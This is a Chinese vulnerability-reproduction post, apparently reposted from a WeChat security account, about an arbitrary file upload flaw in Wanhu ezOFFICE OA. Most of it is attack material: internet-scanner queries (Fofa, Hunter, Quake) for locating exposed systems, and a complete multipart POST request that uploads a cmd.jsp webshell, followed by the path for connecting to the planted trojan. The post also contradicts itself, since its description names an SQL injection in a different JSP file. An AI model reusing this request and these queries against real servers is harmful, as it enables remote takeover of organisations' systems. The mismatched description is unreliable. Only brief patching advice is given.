漏洞描述
万户OA-ezOFFICE DocumentEdit_unite.jsp 接口存在一个 SQL 注入漏洞,通过这个漏洞可以操纵服务器的数据库。这意味着不法分子可以利用这个漏洞来获取对数据库的完全控制权,从而查看、修改甚至删除数据库中的数据,严重威胁系统的安全性。
网络空间测绘
Fofa
app="万户网络-ezOFFICE"
Hunter
app.name=="万户 Ezoffice OA"
Quake
app:"万户ezOFFICE协同管理平台"
漏洞复现
发送请求包上传文件
POST /defaultroot/upload/fileUpload.controller HTTP/1.1
Host:
User-Agent:Mozilla/5.0(Windows NT 6.1;Win64; x64; rv:50.0)Gecko/20100101Firefox/50.0
Accept-Encoding: gzip, deflate
Accept:*/*
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0
Content-Length: 773
--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0
Content-Disposition: form-data; name="file"; filename="cmd.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
《webshell》
--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0--
连接木马 /defaultroot/upload/html/xxxxxxxxxx.jsp
修复建议
1、如⾮必要,禁⽌公⽹访问该系统。
2、用防火墙等安全设备设定访问规则,只允许白名单中的设备访问。
3、及时升级产品到最新版本。
原文始发于微信公众号(凝聚力安全团队):【漏洞复现】万户OA-ezOFFICE fileUpload.controller 任意文件上传漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论